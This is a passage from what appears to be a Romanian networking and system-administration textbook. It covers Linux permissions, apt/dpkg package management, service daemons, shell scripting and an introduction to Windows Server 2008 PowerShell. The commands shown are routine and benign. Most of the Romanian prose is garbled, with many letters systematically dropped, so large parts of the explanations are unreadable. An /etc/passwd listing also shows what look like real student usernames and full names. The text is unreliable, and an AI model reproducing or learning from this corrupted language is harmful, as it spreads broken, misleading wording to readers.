-rw-rw-rw- 1 razvan razvan 0 Sep 12 17:47 a.txt
razvan@anaconda:/tmp$ chmod u+x,g-r,o-w a.txt
-rwx-w-r-- 1 razvan razvan 0 Sep 12 17:47 a.txt
razvan@anaconda:/tmp$ chmod 744 a.txt
-rwxr--r-- 1 razvan razvan 0 Sep 12 17:47 a.txt
“ hi a ea deţi ăto ului și g upului e deţi e fișie ul se ealizează u ajuto ul o e zii

chown. Comanda chown poate fi ulată doa de utilizato ul p i ilegiat:
anaconda:/tmp# ls -l a.txt
-rwxr--r-- 1 razvan razvan 0 2008-09-12 17:47 a.txt
anaconda:/tmp# chown guest:projects a.txt
-rwxr--r-- 1 guest projects 0 2008-09-12 17:47 a.txt
anaconda:/tmp# chown mircea a.txt
-rwxr--r-- 1 mircea projects 0 2008-09-12 17:47 a.txt
0.2.5 Gestiunea pachetelor

Un pachet, sau un pachet software, este o apli aţie sau o o po e tă a esi ilă î fo a
u ei a hi e a e poate fi i stalată de u siste de gestiu e a pa hetelo PM“ – Package
Management System . De o i ei, pa hetele ep ezi tă p og a e p e o pilate a e pot fi
i stalate ușo , sp e deose i e de i stala ea di su se a e este ai a e oioasă.
Lu ul u pa hete i stala e, dezi stala e, o figu a e se ealizează p i i te ediul u ui
sistem de gestiune a pachetelor (precum dpkg, rpm, pacman). Un astfel de pachet o ţi e, î
afa ă de fișie ele aso iate p og a ului și u set de etai fo aţii p e u e siu ea
pa hetului, des ie ea și depe di ţe. PM“-ul folosește a este i fo aţii pe t u a de ide da ă
se va realiza instalarea pachetului, upgrade-ul a estuia, i stala ea depe di ţelo et . O
depe di ţă î t e pa hetele A și B î sea ă ă i stala ea pa hetului A e esită i stala ea
pa hetului B. La fel, dezi stala ea pa hetului B a fo ţa dezi stala ea pa hetului A.
7|Cuprins
Majo itatea dist i uţiilo GNU/Li u foloses oţiu ea de depozit de pa hete repository).
A esta este u U‘L a e p e izează lo aţia di e selo pa hete ale dist i uţiei. A este depozite
su t p e izate î fișie e de o figu a e spe ifi e dist i uţiei. Apli aţii front-end peste PMS pot
i te oga depozitele și pot des ă a și i stala oi pachete.
Î lu ea Li u e istă di e se fo ate de pa hete, ele ai u os ute fii d fo atul DEB,
spe ifi dist i uţiilo De ia - ased și fo atul ‘PM folosit de Fedo a/‘edHat, Ma d i a, “u“E,
etc. Fiecare format are propriul PMS. Utilitarul alien1 permite conversia între diverse formate
de pachete.
0.2.6 Gestiunea pachetelor DEB

Utilita ul de ază PM“ pe t u gestiu ea pa hetelo DEB este dpkg. dpkg este folosit
pe t u i stala ea, dezi stala ea și o figu a ea u ui pa het.
Î od o iș uit, î să, ea ai a e pa te a a esto a ţiu i o fi ealizate p i i te ediul
utilitarului APT (Advanced Packaging Tool). APT este un front-end peste dpkg și pe ite
i te oga ea depozitelo de pa hete o figu ate, e ifi a ea depe di ţelo , des ă a ea
auto ată a pa hetelo di repository, actualizarea acestora, upgrade-ul u ei dist i uţii, et .
Fișie ul de o figu a e a u ui depozit DEB este /etc/apt/sources.list:
anaconda:/tmp# cat /etc/apt/sources.list
[...]
deb http://ftp.lug.ro/debian etch main contrib non-free
deb-src http://ftp.lug.ro/debian etch main contrib non-free
Adăuga ea u ui ou depozit î sea ă adăuga ea u ei oi li ii î fișie ul de o figu a e.

A ţiu ile a e pot fi ealizate u ajuto ul utilita ului apt sunt:
 actualizarea listei de pachete:
anaconda:/tmp# apt-get update
Get: 1 http://ftp.lug.ro etch Release.gpg [386B]
Get: 2 http://ftp.lug.ro etch/updates Release.gpg [189B]
Hit http://ftp.lug.ro etch Release
Get: 3 http://www.backports.org etch-backports Release.gpg [189B]
Get: 4 http://ftp.lug.ro etch/updates Release [37.6kB]
Ign http://debian.pkgs.cpan.org unstable Release.gpg
Get: 5 http://www.backports.org etch-backports Release [43.7kB]
Ign http://ftp.lug.ro etch/main Packages/DiffIndex
Ign http://ftp.lug.ro etch/contrib Packages/DiffIndex
[...]
 ăuta ea de pa hete:
anaconda:/tmp# apt-cache search hevea
hevea - translates from LaTeX to HTML, info, or text
lyx - High Level Word Processor
hevea-doc - HeVeA documentation
 afișa ea de i fo aţii desp e u fișie :

anaconda:/tmp# apt-cache show hevea
Package: hevea
Priority: optional
Section: tex
Installed-Size: 2125
Maintainer: Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>
Architecture: all
Version: 1.09-3
 i stala ea u ui pa het și a depe di ţelo sale :

anaconda:/tmp# apt-get install apt-file
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
libapt-pkg-perl libconfig-file-perl
The following NEW packages will be installed
apt-file libapt-pkg-perl libconfig-file-perl
0 upgraded, 3 newly installed, 0 to remove and 66 not upgraded.
1
http://kitenet.net/~joey/code/alien/
8|‘eţele Lo ale
Need to get 106kB of archives.

After unpacking 406kB of additional disk space will be used.
Do you want to continue [Y/n]? Y
 dezinstalarea unui pachet:

anaconda:/tmp# apt-get remove --purge apt-file
The following packages will be REMOVED
apt-file*
 u ăţa ea a he-ului local de pachete:

anaconda:/tmp# apt-get clean
 instalarea surselor unui pachet:

anaconda:/tmp# apt-get source apt-file
Need to get 17.7kB of source archives.
Get: 1 http://ftp.lug.ro etch/main apt-file 2.0.8.2 (dsc) [505B]
Get: 2 http://ftp.lug.ro etch/main apt-file 2.0.8.2 (tar) [17.2kB]
Î plus faţă de apt, dpkg ofe ă opţiu i pe t u i te oga ea stă ii a tuale a pa hetelo sau a
o ţi utul a esto a. P i t e opţiu ile utile se u ă ă:
 lista ea o ţi utului u ui pa het:
anaconda:/tmp# dpkg -L coreutils
/.
/bin
/bin/mkdir
/bin/mv
/bin/true
/bin/mknod
/bin/sleep
/bin/touch
/bin/chgrp
/bin/uname
/bin/echo
/bin/sync
[...]
 afișa ea pa hetelo al ă o u e se pot i ește u o e p esie egulată:

anaconda:/tmp# dpkg -l 'linux*'
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name Version Description
+++-==============-==============-============================================
un linux <none> (no description available)
un linux-doc-2.6. <none> (no description available)
un linux-gnu <none> (no description available)
un linux-image <none> (no description available)
un linux-image-2. <none> (no description available)
ii linux-image-2. 2.6.18+6etch3 Linux kernel 2.6 image on Ppro/Celeron/PII/P
[...]
 ăuta ea pa hetului e o ţi e u a u it fișie

anaconda:/tmp# dpkg -S /bin/ps
procps: /bin/ps
0.2.7 Gestiunea serviciilor

O pa te i po ta tă a a estei ă ţi este dedi ată di e selo se i ii pe are un sistem de
ope a e le pu e la dispoziţie e , DN“, e- ail . Î ajo itate, se i iile de eţea pe a e u
siste Li u le ofe ă au o fo ă de ad i ist a e o u ă: i stala e, fișie e de o figu a e,
pornire, repornire, oprire, troubleshooting, jurnalizare.
U se i iu de eţea e , DN“, e-mail) este implementat printr-un proces server. Un
proces server este asociat, în lumea Unix, cu un daemon. Un daemon este un proces care
ulează î background de uplat de o i e te i al a e de o i ei as ultă o e iuni pe un
9|Cuprins
a u it po t și ofe ă esu se sau i fo aţii u ui lie t. E e ple de astfel de servere/daemoni

sunt: bind (Berkeley Internet Name Daemon), Apache/httpd, postfix, sshd, courier-imap.
Î ge e al, u se i iu este po it la i iţializa ea siste ului de procesul init, primul
proces pornit de sistemul de operare. De aceea, în general, un daemon va avea asociat un
s ipt de i te a ţiu e î /etc/init.d/. Ope aţiile de po i e, op i e, epo i e a u ui daemon
pot fi realizate, în mod generic, cu ajutorul unui astfel de script:
anaconda:/tmp# /etc/init.d/apache
Usage: /etc/init.d/apache {start|stop|reload|reload-modules|force-reload|restart}
anaconda:/tmp# /etc/init.d/bind9
Usage: /etc/init.d/bind9 {start|stop|reload|restart|force-reload}.
anaconda:/tmp# /etc/init.d/postfix
Usage: /etc/init.d/postfix {start|stop|restart|reload|flush|check|abort|force-reload}.
anaconda:/tmp# /etc/init.d/courier-imap
Usage: /etc/init.d/courier-imap {start|stop|restart|reload|force-reload}
Fiecare server/daemon poate avea și u e a is p op iu de po i e/ epo i e

(apache2ctl pentru Apache sau postfix pentru Postfix da i te faţa /etc/init.d/ este
ge e i ă și o u ă o i ă ui daemon.
Pe t u a e ifi a faptul ă u daemon ulează, se poate folosi o a da netstat pentru a
afișa daemon-ii a e as ultă o e iu ii î eţea:
anaconda:/tmp# netstat --tcp --listening --numeric --programs
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program
name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 3285/apache
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 3285/apache
tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 3080/inetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 3179/vsftpd
tcp 0 0 141.85.37.25:53 0.0.0.0:* LISTEN 2779/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 2779/named
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 3142/master
[...]
Fii d detașate de u te i al de o t ol, i te a ţiu ea u se ii ile se ealizează p i

intermediul fișie elo de o figu a e. “e odifi ă fișie ul/fișie ele de o figu a e aso iate u ui
a u it se i iu și se epo ește se i iul pe t u a fo ţa e iti ea a esto a. Fișie ele de
o figu a e pe t u se i ii su t fișie e te t, su t lo alizate î /etc și o ţi de o i ei di ective
de o figu a e î fo a „nume valoare :
anaconda:/tmp# cat /etc/postfix/main.cf
[...]
myhostname = anaconda.cs.pub.ro
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
[...]
Diversele p o le e a e apa î azul u ei o figu ă i i alide, defe tuoase sau a alto

p o le e su t ide tifi ate p i i te ediul ju alelo . Fie a e se i iu folosește u fișie sau
subdirector în /var/log u de sto hează di e se esaje de i fo a e sau a e tizare pentru
ad i ist ato ul de siste . O i t a e î ad ul fișie ului de ju aliza e i di ă o a la a e s-a
realizat intrarea (timestamp și u esaj de i fo a e. “e folosește, de o i ei, utilita ul tail
pe t u a afișa ulti ele i t ă i di t -u fișie de jurnalizare:
anaconda:/tmp# tail /var/log/mail.err
Sep 10 11:15:33 anaconda imapd-ssl: Error reading ACLs for INBOX.lists.gnupg.: Invalid
argument
Sep 10 11:16:04 anaconda last message repeated 5 times
Sep 10 11:16:26 anaconda last message repeated 4 times
Sep 12 12:14:18 anaconda courierpop3login: authentication error: Input/output error
[...]
0.2.8 Shell scripting

O pa te i po ta tă di sa i ile u ui ad i ist ato de siste su t epetiti e și pot fi ușo
auto atizate. De a eea, u oști ţele de shell scripting sunt fundamentale pentru a asigura
10 | ‘ e ţ e l e L o a l e
efi ie ţa a ti ităţilo efe tuate. U ad i ist ato poate e u ge și la alte limbaj de scripting
precum Perl sau Python dar shell scripting-ul ofe ă posi ilitatea de a folosi o e zi deja
implementate.
Fă ă a-și p opu e să p ezi te e hausti oţiu ile legate de shell scripting, a eastă se ţiu e
ofe ă o t e e e î e istă a aspectelor importante.
0.2.8.1 Structura unui script shell

Un script shell o ţi e pe p i a li ie si olul she-bang (#!) urmat de interpretorul folosit,
spre exemplu #!/bin/bash. U ătoa ele li ii su t i st u ţiu i sau o e zi shell rulate
se e ţial. U e e plu si plu de script shell este cel de mai jos:
razvan@anaconda:/tmp$ cat hw.bash
#!/bin/bash
echo "Hello, World"
exit 0
Rularea acestui script se poate realiza prin transmiterea ca argument interpretorului sau
p i ula ea a estuia a u e e uta il da ă a e d ept de e e uţie :
razvan@anaconda:/tmp$ bash hw.bash
Hello, World
razvan@anaconda:/tmp$ ls -l hw.bash
-rw-r--r-- 1 razvan razvan 41 Sep 13 14:45 hw.bash
razvan@anaconda:/tmp$ chmod a+x hw.bash
razvan@anaconda:/tmp$ ./hw.bash
Hello, World
0.2.8.2 Redire tare și î lă țuirea comenzilor

‘edi e ta ea î sea ă folosi ea u ui fișie pe t u a eţi e ieși ea u ei o e zi sau
pe t u a fi folosit a i t a e a u ei o e zi. ‘edi ta ea ieși ii se ealizează folosi d ope ato ul
>, ia a i t ă ii folosi d <:
anaconda:/tmp# ls > out.txt
anaconda:/tmp# cat < out.txt
apt-file-2.0.8.2
apt-file_2.0.8.2.dsc
apt-file_2.0.8.2.tar.gz
[...]
Î lă ţui ea o e zilo se efe ă la folosi ea ope ato ului | pipe pe t u a t i ite ieși ea
unei comenzi la intrarea alteia:
razvan@valhalla:~$ last -10 | cut -d ' ' -f 1 | sort -u
razvan
reboot
wtmp
0.2.8.3 Variabile
În programarea shell, a și ulte alte li aje de scripting o a ia ilă u a e u tip și poate
fi o side ată, î fu ţie de e oie, și sau u ă . Câte a e e ple de i iţializare de variabile
sunt enumerate mai jos:
var1=5
my_home_dir=/home/users/alpha
list=”a b c d e”
Referirea unei variabile se realizează prin prefixarea numelui acesteia cu $.
razvan@valhalla:~$ echo $a
5
razvan@valhalla:~$ b="a are valoarea $a"
razvan@valhalla:~$ echo $b
a are valoarea 5
11 | C u p r i n s
Operatorul $ poate fi folosit, în mod generic, pentru expandare. Exceptând expandarea

u ei a ia ile la aloa ea a esteia, ope ato ul poate fi folosit pe t u e pa da e a it eti ă sau
pe t u sto a ea ieși ii u ei o e zi:
razvan@valhalla:~$ a=5
razvan@valhalla:~$ b=$((a+3))
razvan@valhalla:~$ echo $b
8
razvan@valhalla:~$ c=$(ls | wc -l)
razvan@valhalla:~$ echo $c
15
0.2.8.4 Ci luri și i stru țiu i de de izie

I st u ţiu ea de de izie folosită î s iptu i este if. If p i ește a a gu e t o o a dă.
‘ezultatul î to s de a eastă o a dă dete i ă e e uţia sau u a i st u ţiu ilo u ătoa e.
De o i ei se folosește o a da test:
if test -f $fname; then # este $fname un fisier
[...]
fi
if test $a -ge 5; then # este $a mai mare sau egal cu 5
[...]
fi
if test “abc” == $string_var; then # este $string_var egal cu șirul “abc”
[...]
fi
Cele ai folosite i st u ţiu i de i la e su t for și while. Mai jos sunt prezentate câteva
exemple de folosire a acestora:
razvan@anaconda:/tmp$ for i in $(seq 1 10); do echo $i; done
1
2
3
4
5
6
7
8
9
10
razvan@anaconda:/tmp$ for i in "a b c"; do touch $i; done
razvan@anaconda:/tmp$ ls -l a b c
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 a
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 b
-rw-r--r-- 1 razvan razvan 0 Sep 13 14:51 c
razvan@anaconda:/tmp$ i=1; while test $i -le 5; do echo $i; ((i++)); done
1
2
3
4
5
0.2.8.5 Filtre de text

O pa te i po ta tă a s iptu ilo shell este folosită pe t u p elu a ea de i fo aţii te t,
fie fișie e te t fie ieși ea a u ito o e zi. O o po e tă i po ta tă a u ui s ipt shell este
ep eze tată, î a est o te t, de o e zi folosite pe t u p elu a ea de i fo aţii te t,
de u ite și filt e de te t. E e ple de astfel de o e zi su t: tail, head, grep, cut.
Comenzile tail și head su t folosite pe t u a afișa p i ele sau ulti ele li ii di t -u fișie
text. Comanda grep este folosită pe t u a sele ta li ii a e o ţi u a u it șa lo . Co a da
cut sele tează oloa e:
razvan@anaconda:/tmp$ cat /etc/passwd | grep and
andrewbwm:x:1031:1026:Andrei Buhaiu:/home/students/andrewbwm:/bin/bash
gabi:x:1039:1026:Gabriel Sandu:/home/students/gabi:/bin/bash
andreic:x:1045:1026:Andrei Cibotaru:/home/students/andreic:/bin/bash
antand:x:1069:100:,,,:/home/users/antand:/bin/bash
alexj:x:1072:1026:Alexandru Juncu:/home/students/alexj:/bin/bash
andreea:x:1082:1028:Andreea Leta:/home/students/andreea:/bin/bash
[...]
razvan@anaconda:/tmp$ cat /etc/passwd | cut -d ':' -f 1,5
[...]
12 | ‘ e ţ e l e L o a l e
iulian:Iulian Moraru,,,
max:Maximilian Machedon,,,
cosmin:Cosmin Ratiu,,,
adrian:Adrian Nistor,,,
cristina:Cristina Carbunaru,,,
amihaiuc:Alex Mihaiuc,,,
0.3 Introducere în Microsoft Windows Server 2008

Alege ea şi i stala ea u ui NO“ Network Operating System – un sistem de operare
o eput pe t u a fu ţio a î eţea ep ezi tă u a di t e ele ai i po ta te sa i i e se
egăses p i t e espo sa ilităţile u ui ad i ist ato de eţea. De apa ilităţile siste elo de
operare instalate depind toate procesele ulterioare de administrare, configurare, securizare,
actualizare, extindere, backup şi, de e u, de ati ge e a u ui user-experience favorabil.
A easta este p i a ediţie a ă ţii de faţă î a e ad i ist a ea se i iilo de eţea a fi
t atată deopot i ă di pe spe ti a Li u /UNIX ât şi di pu tul de ede e al alte ati ei
Microsoft în domeniul NOS-urilor: Windows Server 2008.
A fost ales Windows Server 2008 pe t u a eastă ediţie a ă ţii u pe t u a-i pu e î lu i ă
plusu ile sau i usu ile faţă de ediul Li u , i pe t u a p eze ta o alte ati ă de ă de luat
î o side a e di a est do e iu, o opţiu e fu ţio ală şi apli a ilă, o plet sau pa ţial, î
o epe ea şi i ple e ta ea u ei eţele de al ulatoa e.
Fie a e apitol, î li ita apli a ilităţii, a p eze ta, î plus, teh i i şi opţiu i de o figu a e
a se i iilo de eţea î ediul Wi do s. Deoa e e Windows Server 2008 ep ezi tă deja o
soluţie p op ieta ă, se a î e a li itarea gradului de acoperire a serviciilor la nivelul celor
disponibile implicit într-o instalare de Windows Server 2008, u o se aţiile de igoa e a olo
u de pot apă ea dife e ţe legate de e siu i. De ase e ea, a fi dedi at u efo t su sta ţial
pentru evide ţie ea şi utiliza ea posi ilităţilo de scripting oferite de Windows prin
PowerShell.
0.3.1 Despre Microsoft Windows Server 2008

La o e tul s ie ii a estei ă ţi, Windows Server 2008 ep ezi tă el ai e e t p odus
din gama sistemelor de operare de la Microsoft şi, totodată, el ai e e t di se ia “e e . Î
pagi ile a estei ă ţi o fi e ide ţiate fa ilităţile ofe ite de Windows Server 2008 într-un
o te t u ita , fă ă a a e tua doa eea e este spe ifi lui Windows Server 2008. De aceea,
este posibil a ulte di t e o eptele, p o edu ile şi se i iile des ise să o espu dă î t -o
oa e a e ăsu ă elo p eze te î e siu ile a te ioa e di se ie: Windows Server 2003,
Windows 2000, etc, cu Service Pack-urile aferente.
Windows Server 2008 i t ă î s ena sistemelor de operare ca un succesor direct al lui
Windows Server 2003, care s-a bucurat de un succes semnificativ. Înainte de a fi definitivat, în
faza sa i ipie tă, el a fost de u it Codename Longhorn a e, î ele di u ă, s-a dovedit a fi
o platfo ă de ază atât pe t u a ia ta p eze tă de Wi do s “e e ât şi pe t u Wi do s
Vista, lansat cu ceva timp înaintea versiunii Server. Din cauza acestei baze comune, Windows
Server 2008 şi Vista î pă tăşes destul de ulte p op ietăţi e ţi de a hite tu ă şi
fu ţio alitate de ază.
Atât Windows Server 2008 ât şi Vista ofe ă fa ilităţi si ila e u p i i e la se u itate,
a age e t şi ad i ist a e, î ge e al, î p eu ă u u supo t solid pe t u IP , utilita e
wireless ati e p e u şi ulte alte fa ilităţi e se o fo ează e i ţelo eţelelo ,
teh ologiilo şi utilizato ilo di p eze t. Bi eî ţeles, disti ţia di t e ele două de i e d asti ă
în momentul în care Windows Server 2008 se depă tează de ediul p epo de e t
desktop/workstation al lui Vista p i opţiu ile de i ple e ta e la s a ă la gă, î edii
enterprise, utilita e de o ito iza e şi diag osti , edu da ţă şi fa ilităţi de se u itate ult
î u ătăţite.
13 | C u p r i n s
Î se sul său de ază, u „server t e uie să ofe e se i ii u o utilizato i sau alto servere,
o i, a î azul el ai des i tâl it î lu ea eală, o o i aţie a elo două. Î te e i
teh i i, se e ul ep ezi tă, de fapt, siste ul de ope a e al aşi ii e î depli eşte olul de
se e , î p eu ă u apli atiile pe a e a esta le susţi e şi le foloseşte pe t u a putea ofe i
se i iile e ţio ate a te io . E ide t, î a este o diţii, o platfo ă de tip se e a t e ui
să supo te u i el dife it de î ă a e şi u od dife it de utiliza e a esu selo sale faţă de o
platfo ă desktop/workstation. De ase e ea, u se e t e uie să poată fu ţio a o
pe ioadă î delu gată de ti p fă ă sup a eghe e şi să i ple e teze e a is e sigu e de
e upe a e î azul e o ilo sau e e i e telo ep e ăzute. Totodată, a estea t e uie
documentate într-un siste de e ţi e e a ju alelo logging) bine pus la punct pentru a
putea ofe i apid şi oe e t i fo aţii desp e e oluţia siste ului. A estea su t, de ase e ea,
aspecte prin care Windows Server 2008 se dista ţează de Vista şi, i pli it, de o i e alt siste
de operare orientat spre mediul desktop.
0.3.2 Windows PowerShell
0.3.2.1 Ce este Windows PowerShell?

Pe scurt, PowerShell ep ezi tă oua ge e aţie de i te p eto de o e zi şi li aj de
scripting de la Mi osoft, o st uit peste platfo a .NET şi CL‘ Common Language Runtime),
e poate fi folosit atât pe t u î lo ui ea „ e e a ilului i te p eto de o e zi cmd.exe, ât şi
a li ajului VB“ ipt. A eastă atu ă „duală a lui PowerShell poate ea i iţial p o le e
p i t e ad i ist ato o iş uiţi u cmd.exe şi sla ele sale apa ilităţi sau u VB“ ipt,
depot i ă pute i şi difi il i o od folosit pe t u auto atiza ea sa i ilo . A este u elte
fu ţio ează satisfă ăto di pu tul de ede e al fu ţio alităţii pe a e o ofe ă, da su t î
prezent folosite în scopuri pentru care nu au fost create. Cmd.exe a fost scris ca un interpretor
succesor al DOS Prompt-ului, ia VB“ ipt a fost ai ult sau ai puţi o eput î o te tul
pagi ilo e . Ni iu ul u a fost o eput de la u î eput de ăt e ad i ist ato i sau
pentru ei.
Majo itatea i te p etoa elo de o e zi, p i t e a e şi cmd.exe, alătu i de
interpretoarele din mediul UNIX (sh, csh, ksh, bash, et fu ţio ează p i e e uta ea
o e zilo î ad ul u o p o ese oi, etu â d ezultatul su fo ă de te t utilizatorului.
Din acest motiv, de-a lungul timpului, în special în mediul UNIX, utilitarele de procesare de text
au fost î u ătăţite î pe a e ţă, ofe i d î od i di e t fu ţio alităţi di e î e ai
e ti se i te p eto ului î si e şi uşu â d i te a ţiu ea utilizatorului cu el. De asemenea,
i te p etoa ele a eptă o e zi e su t î o po ate di e t î fu ţio alitatea lo , la a eastă
categorie pretându-se cu succes cmd.exe. Î o i e az, apa ilităţile i te e ale
interpretoarelor de comenzi sunt limitate, d ept pe t u a e o a e pa te di fu ţio alitatea
pe a e a estea o ofe ă se azează pe utilita ele pe a e a estea le apelează. La a est apitol,
Windows PowerShell fu ţio eză oa e u dife it, el t atâ d o e zile a pe işte o ie te î
contextul platfo ei .NET, e su t t e ute p i a elaşi i te p eto , eea e i p i ă u
o po ta e t u ita p e u şi o fo ă o siste tă a o e zilo . PowerShell la versiunea 1.0
supo tă ap o i ati de o e zi, toate î o po ate î i te p eto .
0.3.2.2 Instalarea Windows PowerShell

Pe un sistem Windows Server 2008 nu este e esa ă des ă a ea de pe I te et a
pachetului de instalare. PowerShell este disponibil ca feature al siste ului şi u e e esa ă
de ât a ti a ea sa ezi se ţiu ea u ătoa e .
14 | ‘ e ţ e l e L o a l e
Î afa ă de Windows Server 2008, PowerShell ai poate fi i stalat şi poate ula pe

u ătoa ele platfo e:
 Windows XP Service Pack 2
 Windows 2003 Service Pack 1
 Windows Vista
 O i e e siu e ai e e tă a a esto a
Pe t u toate siste ele de ope a e de ai sus este e esa ă p eze ţa Microsoft .NET
Framework el puţi la e siu ea . .
La o e tul s ie ii a estei ă ţi, e siu ea u e tă de PowerShell e poate fi des ă ată
de pe site-ul Microsoft este Windows PowerShell 2.0 CTP21 (Community Technology Preview).
Versiunea de PowerShell i lusă î Windows Server 2008 este . . Î ai tea i stală ii u ei
oi e siu i, este e esa ă dezi stala ea elei e hi folosi d Add/Remove Programs sau
Programs and Features din Control Panel.
Pe e siu ile de Wi do s pe de iţi, PowerShell se instalează i pli it î di e to ul
%SystemRoot%\System32\WindowsPowerShell\v1.0.
Pe e siu ile de Wi do s pe de iţi, a ia ta PowerShell pe de iţi se i stalează î
directorul %SystemRoot%\SystemWow64\WindowsPowerShell\v1.0 ia a ia ta pe de iţi,
a şi în cazul anterior, la %SystemRoot%\System32\WindowsPowerShell\v1.0.
0.3.2.3 La sarea î e e uție a Windows PowerShell

Pentru a minimiza riscurile de securitate, Windows Server 2008 i stalează i pli it doa u
set minimal de componente. De aceea, pentru a porni PowerShell pe Windows Server 2008,
acesta trebuie instalat mai întâi ca feature al sistemului. Calea pentru activarea PowerShell ca
feature este:
1. “e la sează Server Manager
2. În lista de features se sele tează Add feature
3. “e ifează Windows PowerShell şi se o fi ă i stala ea
Odată i stalat, su t dispo i ile ai ulte etode de a-l porni:

 Di fe east a de Run , s ii d PowerShell şi apăsâ d Enter
 Din interpretorul cmd.exe, scriind PowerShell şi apăsâ d Enter
 Din meniul Start > All Programs > Windows PowerShell 1.0 > Windows
PowerShell
0-3: Prompt-ul PowerShell, după la sare
Deoarece PowerShell ulează î t -o sesiu e de o solă, poate fi la sat şi o t olat şi de la

dista ţă, p i Telnet sau SSH. Pentru reveni ea la p o ptul de o a dă se tastează exit.
După la sa e, se o se ă ă i te faţa PowerShell este e t e de si ila ă u ea di
cmd.exe, u e epţia faptului ă a a de titlu o ţi e a u te tul Windows PowerShell,
prompt-ul afişează a a te ele PS la începutul liniei, iar fundalul ferestrei este albastru (cu
e epţia azului î a e a fost la sat di e t di cmd.exe).
1
http://www.microsoft.com/technet/scriptcenter/topics/winpsh/pshell2.mspx
15 | C u p r i n s
0.3.2.4 Co figurări
I te faţa PowerShell-ului poate fi o figu ată p i t -u set elati i i al de opţiu i
disponibile prin clic-dreapta pe bara de titlu, la opţiu ea Properties.
P i t e pa a et ii e pot fi o figu aţi se u ă ă: ă i ea buffer-ului, tipul de font folosit
şi ă i ea sa, ă i ea fe est ei şi a zo ei e poate fi de ulată, p e u şi s he a de ulo i
folosită.
0.3.2.5 Comenzile PowerShell

PowerShell pe ite ad i ist ato ilo să o t oleze şi să auto atizeze ad i ist a ea
siste ului de ope a e, da şi a apli aţiilo e ulează pe el. Co e zile sale su t u ite
„cmdlet(s) p o u ţat „command-let(s) – î a te o fi u ite si plu „ o e zi de aici
î olo şi pe it a esul atât la siste ul de fişie e şi la di e se esu se ale siste ului, p e u
şi la zo e a registry, certificate digitale, etc.
„Li ajul o e zilo PowerShell este unul orientat pe obiecte, înrudit cu limbajele de
nivel înalt ce folosesc platforma .NET, cum ar fi C#, comun tuturor comenzilor, conceput
pe t u a si plifi a sa i ile o ple e, fă ă a adăuga u su plus i a epta il de o ple itate
celor simple.
Pe t u a lista toate opţiu ile u p i i e la pa a et ii dispo i ili la pornirea PowerShell, din
cmd.exe, se foloseşte o a da:
PowerShell -?
Pentru a accesa ajutorul inclus în PowerShell, după po i ea a estuia se poate i t odu e

comanda:
Get-Help
Majoritatea comenzilor PowerShell sunt simple, dar pot fi folosite în diverse o i aţii.
Ele su t uso ide tifi a ile după fo atul u elo : u e şi u su sta ti sepa ate p i t -o
li iuţă -), de exemplu: Get-Process, Start-Service, Get-Help. Din formatul comenzilor se
desprind câteva categorii:
 o e zile de tip „get a e etu ează date;
 o e zile de tip „set a e i t odu sau odifi ă date;
 o e zile de tip „out a e di e ţio ează ieşi ea sp e o desti aţie spe ifi ată;
 o e zile de tip „format a e s hi ă fo atul datelo etu ate a ezultat.
Pe t u a afişa o listă o pletă a o e zilo supo tate de PowerShell se poate folosi
comanda1:
Get-Command
Fie a e o a dă i lude o se ţiu e de ajuto a e des ie o po ta e tul, si ta a şi

pa a et ii o e zii, alătu i de posi ile e e ple de utiliza e, a î azul pagi ilo man din
ediul UNIX. Pe t u a a esa i fo aţiile de ajuto ale u ei o e zi se foloseşte si ta a:
Get-Help <nume_comanda> -Detailed, a î e e plul u ăto :
PS C:\Users\Administrator> get-help get-help -detailed
NAME
Get-Help
SYNOPSIS
Displays information about Windows PowerShell cmdlets and concepts.
SYNTAX
1
“e o se ă ă î ezultatul lui Get-Command su t etu ate doa a ele o e zi spe ifi e şi supo tate
ati de ăt e PowerShell, dar nu sunt listate toate comenzile suportate de acesta prin alias-uri sau din motive de
compatibilitate cu vechile comenzi DOS sau UNIX. Mai multe detalii î se ţiu ea 0.3.2.10.
16 | ‘ e ţ e l e L o a l e
[...]
DETAILED DESCRIPTION
[...]
PARAMETERS
[...]
0-4: Ajutor pentru comanda Get-Help
Î e e plul u ăto , o a da afişează o listă u toate fişie ele de ajutor din Windows
PowerShell:
C:\PS>get-help *
Î legătu ă u la sa ea p og a elo e te e di PowerShell, trebuie avut în vedere faptul

ă a esta î p u ută ap oape o plet fu ţio alitatea ofe ită de cmd.exe, spre exemplu
posi ilitatea la să ii de apli aţii atât î li ie de o a dă ât şi a elo g afi e calculator,
notepad, etc) PowerShell identificând executabilele de lansat în directoarele specificate de
variabila de mediu %PATH%, la fel a şi cmd.exe. De ase e ea, edi e tă ile fu ţio ează
identi . Afişa ea a ia ilei de ediu %PATH% se poate face cu PowerShell prin comanda
Get-Content env:path.
Pentru cmd.exe, o a da si ila ă este:

echo %path%.
De asemenea, în PowerShell, se poate folosi o pleta ea auto ată a o e zilo pe t u a

cicla între variabilele de mediu disponibile. Pentru aceasta, se apasa tasta Tab după ele două
pu te de după „env . Î cmd.exe, pe t u a etu a o listă a a ia ilelo de ediu defi ite,
î p eu ă u alo ile lo , se foloseşte o a da „set .
0.3.2.6 Comenzi de ajutor în PowerShell

O ţi e ea de ajuto pe t u o e zile di PowerShell se face prin comanda:
Get-Help
I t odu e ea o e zii fă ă pa a et i a e a efe t afişa ea de i fo aţii legate de odul

de utilizare al comenzii Get-Help.
Pe t u a o ţi e ajuto desp e o a u ită o a dă se i t odu e o a da espe ti ă a
parametru:
Get-Help Get-Process
Pe t u a se afişa i fo aţii detaliate desp e o o a dă, se foloseşte pa a et ul

detailed:
Get-Help Get-Process -Detailed
Da ă se do eşte afişa ea tutu o i fo aţiilo de ajuto pe t u o a u ită o a dă, la u

